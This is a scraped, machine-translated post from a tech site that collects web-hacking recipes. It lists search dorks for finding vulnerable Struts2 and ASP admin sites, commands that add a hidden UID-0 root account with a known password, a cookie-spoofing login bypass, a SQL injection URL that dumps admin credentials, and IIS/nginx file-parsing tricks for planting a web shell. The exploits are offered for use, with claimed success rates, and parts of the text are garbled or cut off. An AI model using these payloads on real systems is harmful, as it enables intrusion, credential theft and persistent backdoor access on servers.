Shulou(Shulou.com)06/01 Report--

Collection of various web vulnerabilities

struts2:

Inurl:index.action

Inurl: Mall.action

Inurl:index.action Title:apache struts2

Inurl:action? id=

site:.com inurl:index.action

inurl:dhis-web-commons

Use the tool operation, add account password:

useradd -u 0 -o -g root -G root -d /home/bingdao bingdao -p $1$jWIKT776$A8S37J9KR3Z4dpbJVX3rW0

Account number: bingdao

Password: 1

Generate encryption password details:

The following command generates an encrypted password (the first 1 is the password):

echo "1" | openssl passwd -1 -salt $(< /dev/urandom tr -dc '[:alnum:]' | head -c 32) -stdin

Encrypted password generated: $1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/

Then add an account with root permissions and the password above:

useradd -u 0 -o -g root -G root -d /home/lengyu lengyu -p'$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/'

You get the user with account number "Lengyu" and password "1", and then ssh it up.

------------------------------------------------------

szwyadmin cookies spoof:

inurl:szwyadmin/login.asp

inurl:szwyadmin

Code:

_javascript:alert([xss_clean]="adminuser="+escape("'or'='or'"));_javascript:alert([xss_clean]="adminpass="+escape("'or'='or'"));_javascript:alert([xss_clean]="admindj="+escape("1"));

Copy the code and enter. Convenient and fast. Then close the web page and reopen the background address, and then change login.asp to admin_index.asp in the address bar to enter the background directly. This method has a success rate of more than 80 percent.

There is also a code for today.

It's easy to use. Fill in the domain name directly and click the password.~~~ Direct injection administrator account password. The success rate is not ideal after all is a lot of loopholes.

-------------------------------------------------------------------------------------------------------------------------

Southern data:

inurl:HrDemand.asp

/NewsType.asp? SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

admin/southidceditor/admin_style.asp

--------------------------------------------

Explode the library:

inurl:conn.asp

----------------

iis6 parsing vulnerability:

The requested URL/xx.jpg was not found on this server.

Note: Create a folder named.asp or.asa under the website, and any files with extensions in the directory are parsed and executed by IIS as asp files.

File resolution 1.asp;.jpg

Note: Will be regarded as a server 1.asp and IIS6.0 default executable file in addition to asp also contains these three

/1.asa

/1.cer

/1.cdx

-----------------------------------

iis7.0/iis7.5/ nginx

file, and then visit 1.jpg/.php, in this directory will generate a sentence *** shell.php

------------------------------------------------------------------

Nginx

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.